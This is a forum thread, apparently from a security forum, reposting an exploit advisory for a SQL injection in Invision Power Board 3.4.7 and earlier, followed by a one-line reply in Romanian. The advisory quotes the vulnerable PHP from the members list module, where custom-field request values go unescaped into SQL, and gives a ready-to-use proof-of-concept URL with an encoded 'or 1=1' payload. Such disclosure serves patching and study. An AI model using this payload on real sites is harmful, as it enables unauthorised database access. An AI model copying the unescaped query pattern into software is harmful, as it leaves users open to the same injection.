Aerosol Posted May 31, 2015 Report Posted May 31, 2015 # Exploit Title: Invision Power Board <= 3.4.7 SQL Injection# Date: 29.05.2015# Exploit Author: ZeroDay# Software Link: http://www.invisionpower.com/# Version: <= 3.4.7# Tested on: 3.4.7# About: For the G-Owl with Lovevuln codeadmin/applications/members/modules_public/list/view.php//-----------------------------------------// Custom fields?//-----------------------------------------if ( count( $this->custom_fields->out_fields ) ){foreach( $this->custom_fields->out_fields as $id => $data ){if ( !empty($this->request[ 'field_' . $id ]) ){$_queryPP = true;if( is_array($this->request[ 'field_' . $id ]) ){foreach( $this->request[ 'field_' . $id ] as $k => $v ){$this->request[ 'field_' . $id ][ $k ] = urldecode($v);$url['field_' . $id] = "field_{$id}[{$k}]=" . $v;}}else{$url['field_' . $id] = "field_{$id}=" . $this->request[ 'field_' . $id ];$this->request[ 'field_' . $id ] = urldecode($this->request[ 'field_' . $id ]);}if( $this->custom_fields->cache_data[ $id ]['pf_type'] == 'drop' ){$query[] = "p.field_{$id}='" . $this->request[ 'field_' . $id ] . "'";}else if( $this->custom_fields->cache_data[ $id ]['pf_type'] == 'cbox' ){if ( count( $this->request[ 'field_' . $id ] ) ){if ( $this->custom_fields->cache_data[ $id ]['pf_search_type'] == 'loose' ){$cboxFields = array();foreach ( $this->request[ 'field_' . $id ] as $k => $v ){$cboxFields[] = "p.field_{$id} LIKE '%|{$k}|%'";}$query[] = "( " . implode( ' OR ', $cboxFields ) . " )";}else{foreach ( $this->request[ 'field_' . $id ] as $k => $v ){$query[] = "p.field_{$id} LIKE '%|{$k}|%'";}}}}else{$query[] = $this->custom_fields->cache_data[ $id ]['pf_search_type'] == 'loose' ? "p.field_{$id} LIKE '%" . $this->request[ 'field_' . $id ] . "%'" : "p.field_{$id} = '" . $this->request[ 'field_' . $id ] . "'";}}}}......POCindex.php?/members/?field_1=admin%2525%2527%2Bor%2B1%253D1--%2B1Source 1 Quote
Nytro Posted June 1, 2015 Report Posted June 1, 2015 Nasol. Era o optiune de migrare de la vBulletin. Quote
